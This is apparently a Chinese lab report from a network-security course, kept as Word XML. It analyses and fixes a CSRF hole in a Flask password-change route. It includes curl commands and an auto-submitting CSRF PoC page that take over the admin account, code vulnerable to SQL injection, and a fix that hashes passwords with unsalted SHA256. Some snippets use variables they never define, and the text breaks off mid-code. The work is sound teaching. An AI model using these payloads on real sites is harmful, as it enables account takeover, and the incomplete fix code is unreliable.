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1A2E"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>CSRF跨站请求伪造漏洞</w:t>
        <w:br/>
        <w:t>分析与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="454545"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>——基于Flask修改密码功能的CSRF漏洞实验——</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验项目：Web安全漏洞分析与修复</w:t>
        <w:br/>
        <w:t>课程名称：网络安全实训</w:t>
        <w:br/>
        <w:t>报告日期：2026年7月</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>目  录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第1章  CSRF漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第2章  CSRF核心原理与攻击链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第3章  攻击链详解：普通用户→越权管理员</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第4章  实验一：curl构造跨域恶意请求修改密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第5章  实验二：Burp Suite生成CSRF PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第6章  /change-password 漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第7章  修复方案详解（含完整代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第8章  修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第9章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第一章  CSRF漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF（Cross-Site Request Forgery，跨站请求伪造）是一种Web安全攻击方式，攻击者诱导已登录用户点击恶意链接或访问恶意页面，利用用户在当前站点的登录状态，以用户身份执行非本意的操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 漏洞危害评级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评估项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评级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CVSS 3.0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8.8（High）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攻击向量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网络远程攻击（AV:N）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攻击复杂度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低（AC:L）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影响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账号劫持、权限提升、数据篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 CSRF攻击三要素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF攻击的成功需要同时满足以下三个条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>要素1：用户已登录目标站点 — 浏览器中存有有效的Session Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>要素2：目标站点存在CSRF漏洞 — 敏感操作仅依赖Cookie验证，无额外Token校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>要素3：用户访问恶意页面 — 攻击者诱导用户点击链接或加载图片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 攻击场景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本实验中，攻击者构造一个恶意HTML页面，该页面包含一个自动提交的表单，目标为用户管理系统中的 /change-password 路由。当管理员admin（已登录状态）在浏览器中打开该恶意页面时，浏览器会自动发送POST请求修改admin的密码。攻击者随后使用新密码登录admin账户，获得管理员权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第二章  CSRF核心原理与攻击链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 攻击流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF攻击的完整流程：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Step 1: 用户登录目标网站 → 获得Session Cookie</w:t>
        <w:br/>
        <w:t>Step 2: 攻击者构造恶意页面 → 包含自动提交的修改密码表单</w:t>
        <w:br/>
        <w:t>Step 3: 诱导用户访问恶意页面 → 通过钓鱼邮件/链接等方式</w:t>
        <w:br/>
        <w:t>Step 4: 浏览器自动发送POST请求 → Cookie自动携带</w:t>
        <w:br/>
        <w:t>Step 5: 服务器执行密码修改 → 认为请求来自合法用户</w:t>
        <w:br/>
        <w:t>Step 6: 攻击者用新密码登录 → 获得用户账号权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 恶意页面示例（伪代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>攻击者构造的CSRF攻击HTML页面：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&lt;html&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t>&lt;h1&gt;🎉 恭喜中奖！点击领取奖品&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t>&lt;form id="csrf" action="http://target:5000/change-password" method="POST"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="username" value="admin"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="new_password" value="hacked123"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;document.getElementById("csrf").submit();&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Cookie自动携带机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>浏览器会自动在同一域名下的请求中携带Cookie，这是CSRF攻击能够成功的根本原因。用户在访问攻击者页面时，浏览器会自动将目标站点的Cookie附加到请求中，服务器无法区分请求是用户自愿发起的还是被伪造的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第三章  攻击链详解：普通用户→越权管理员</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 完整攻击链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次实验的完整攻击链分为四步：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步骤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操作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效果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Step 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alice登录系统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获得有效Session Cookie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Step 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CSRF攻击修改admin密码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admin的密码被改为攻击者指定的值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Step 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用新密码登录admin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攻击者获得管理员权限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Step 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越权删除用户carlos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利用admin权限执行敏感操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 攻击链图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┌──────────┐    ┌──────────────┐    ┌──────────┐    ┌──────────┐</w:t>
        <w:br/>
        <w:t>│ alice登录  │──→│ CSRF改admin   │──→│ 新密码登录 │──→│ 越权删用户 │</w:t>
        <w:br/>
        <w:t>│ 获得Cookie │   │ 密码=hacked123│   │ admin     │   │ carlos    │</w:t>
        <w:br/>
        <w:t>└──────────┘    └──────────────┘    └──────────┘    └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第四章  实验一：curl构造跨域恶意请求修改密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 实验目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>模拟攻击者利用已登录用户alice的Session Cookie，通过curl命令构造跨域恶意请求，修改管理员admin的密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 1：攻击者先登录自己的账号（alice）获取有效Session Cookie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curl -c /tmp/alice_cookies.txt -X POST http://target:5000/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=alice&amp;password=alice2025"</w:t>
        <w:br/>
        <w:t># -c 参数保存服务器返回的Cookie到文件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step 2：利用alice的Session Cookie修改admin的密码（CSRF + 越权）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curl -b /tmp/alice_cookies.txt -X POST http://target:5000/change-password \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=admin&amp;new_password=hacked123"</w:t>
        <w:br/>
        <w:t># -b 参数在请求中附带上alice的Cookie</w:t>
        <w:br/>
        <w:t># ⚠️ 服务器未验证session用户与提交的username是否一致</w:t>
        <w:br/>
        <w:t># ⚠️ 服务器未验证CSRF Token</w:t>
        <w:br/>
        <w:t># ⚠️ 服务器未验证原密码</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step 3：攻击者用新密码登录admin账户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curl -c /tmp/admin_cookies.txt -X POST http://target:5000/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=admin&amp;password=hacked123"</w:t>
        <w:br/>
        <w:t># 成功以admin身份登录！</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step 4：利用admin权限越权删除用户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curl -b /tmp/admin_cookies.txt -X POST http://target:5000/admin/delete-user \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "user_id=2"</w:t>
        <w:br/>
        <w:t># admin权限成功删除用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 攻击效果验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过上述攻击链，一名普通用户alice可以完成以下操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. 修改管理员admin的密码（CSRF + 越权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. 用新密码登录admin账户（权限提升）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. 利用admin权限删除其他用户（越权操作）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>整个过程不需要admin的原始密码，也不需要admin做任何确认操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第五章  实验二：Burp Suite生成CSRF PoC修改密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 实验目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用Burp Suite拦截POST /change-password请求，自动生成CSRF攻击Proof of Concept（PoC）HTML代码。当受害者在已登录状态下打开该HTML页面时，密码被无感知修改。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 1：使用Burp Suite拦截POST /change-password请求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POST /change-password HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: http://target:5000</w:t>
        <w:br/>
        <w:t>Cookie: session=abc123...</w:t>
        <w:br/>
        <w:br/>
        <w:t>username=admin&amp;new_password=attacker123</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step 2：在Burp拦截到的请求上右键 → Engagement tools → Generate CSRF PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 3：Burp Suite自动生成CSRF攻击HTML代码</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Burp生成的CSRF PoC（修改密码版本）：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&lt;html&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;🎉 免费抽奖！点击领取&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;form action="http://target:5000/change-password" method="POST"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="username" value="admin" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="new_password" value="attacker123" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="submit" value="Submit request" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;script&gt;document.forms[0].submit();&lt;/script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step 4：将生成的HTML代码保存为 csrf_attack.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 5：在受害者浏览器中打开该HTML文件（受害者需已登录admin后台）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 6：admin的密码被无感知修改为 attacker123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 CSRF PoC的关键组件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组件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&lt;form&gt;标签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POST方法提交到 /change-password 路由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&lt;input type=hidden&gt;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隐藏字段：username=admin, new_password=attacker123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&lt;script&gt;自动提交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页面加载后立即提交表单，用户无感知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攻击链扩展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修改密码后可登录admin删除其他用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第六章  /change-password 漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 有漏洞代码（app.py）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@app.route("/change-password", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def change_password():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    username = request.form.get("username", "")       # ⚠️ 用户可控</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    if not username or not new_password:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "缺少参数"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞1：无CSRF Token验证 → 任意网站可伪造提交</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞2：无原密码验证 → 直接设置新密码</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞3：无Session绑定 → 可修改任意用户密码（越权）</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞4：无Referer验证 → 不检查请求来源</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞5：SQL注入 → 字符串拼接</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞6：密码明文存储 → 数据库直接存储明文</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    sql = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute(sql)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.commit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 六个安全漏洞一览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漏洞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严重度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攻击利用方式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无CSRF Token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🔴高危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攻击者构造恶意HTML页面，诱导已登录用户访问，自动提交修改密码表单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无需原密码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🔴高危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知道用户名即可直接修改密码，暴力枚举+社工即可攻破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越权改密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🔴高危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已登录用户可修改任意用户的密码（username由表单提交）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无Referer验证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🟡中危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无法区分请求来自本站还是来自攻击者的恶意页面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SQL注入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🔴高危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username参数直接拼接SQL语句，可猜测/绕过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明文存储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🟡中危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数据库直接存储明文密码，数据泄露后密码完全暴露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第七章  修复方案详解（含完整代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 修复1：CSRF Token验证（核心）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 登录时生成随机Token存入Session，表单提交时匹配验证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# 登录成功时：</w:t>
        <w:br/>
        <w:t>session["csrf_token"] = uuid.uuid4().hex</w:t>
        <w:br/>
        <w:br/>
        <w:t># 表单中：</w:t>
        <w:br/>
        <w:t>&lt;input type="hidden" name="csrf_token" value="{{ session.csrf_token }}"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># 后端验证：</w:t>
        <w:br/>
        <w:t>token = request.form.get("csrf_token", "")</w:t>
        <w:br/>
        <w:t>if token != session.get("csrf_token", ""):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "CSRF Token验证失败，请刷新页面重试"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 修复2：Session绑定（防越权改密）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 只能修改当前登录用户的密码，禁止修改他人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if username != session["username"]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    audit_logger.warning(f"越权改密被拒: {session['username']}→{username}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "无权修改他人密码"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 修复3：Referer验证（防CSRF）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 验证请求来源是否为本站点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referer = request.headers.get("Referer", "")</w:t>
        <w:br/>
        <w:t>if not referer or not referer.startswith(request.host_url):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    audit_logger.warning(f"CSRF被拒: Referer={referer}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "请求来源不合法"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 修复4：参数化查询 + 密码哈希</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 参数化查询防SQL注入 + SHA256哈希存储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hashed_pw = hashlib.sha256(new_password.encode()).hexdigest()</w:t>
        <w:br/>
        <w:t>c.execute("UPDATE users SET password = ? WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">          (hashed_pw, username))</w:t>
        <w:br/>
        <w:t>conn.commit()</w:t>
        <w:br/>
        <w:t>audit_logger.info(f"密码修改成功: 用户={username}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.5 完整修复代码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@app.route("/change-password", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def change_password():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    username = request.form.get("username", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    if not username or not new_password:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "缺少参数"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复1：CSRF Token验证</w:t>
        <w:br/>
        <w:t xml:space="preserve">    token = request.form.get("csrf_token", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if token != session.get("csrf_token", ""):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "CSRF Token验证失败"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复2：防越权（只能修改自己的密码）</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if username != session["username"]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "无权修改他人密码"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复3：Referer验证防CSRF</w:t>
        <w:br/>
        <w:t xml:space="preserve">    referer = request.headers.get("Referer", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not referer.startswith(request.host_url):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "请求来源不合法"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复4：参数化查询 + 密码哈希</w:t>
        <w:br/>
        <w:t xml:space="preserve">    hashed_pw = hashlib.sha256(new_password.encode()).hexdigest()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn = get_db()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c = conn.cursor()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("UPDATE users SET password = ? WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">              (hashed_pw, username))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.commit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.close()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第八章  修复前后代码对比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对比项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有漏洞(app.py)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已修复(app_fixed.py)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CSRF Token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无Token验证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uuid生成 + Session校验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原密码验证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无需原密码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必须与Session用户名匹配（防越权）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越权防护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可改任何人密码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只能修改自己的密码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Referer验证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无任何验证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验证Referer来源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SQL注入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字符串拼接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参数化查询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密码存储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明文存储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SHA256哈希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审计日志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无日志记录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logging记录操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>核心代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>有漏洞版本（app.py — 仅22行）：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@app.route("/change-password", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def change_password():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    username = request.form.get("username", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not username or not new_password:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "缺少参数"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 无CSRF Token / 无原密码 / 无越权校验 / 无Referer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 明文存储 + SQL注入</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sql = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute(sql); conn.commit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E7D32"/>
        </w:rPr>
        <w:t>修复版本（app_fixed.py — 完整校验）：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@app.route("/change-password", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def change_password():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    username = request.form.get("username", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ CSRF Token验证</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if token != session.get("csrf_token", ""):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "CSRF Token验证失败"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 防越权：只能修改自己的密码</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if username != session["username"]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "无权修改他人密码"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ Referer验证</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not referer.startswith(request.host_url):</w:t>
        <w:br/>
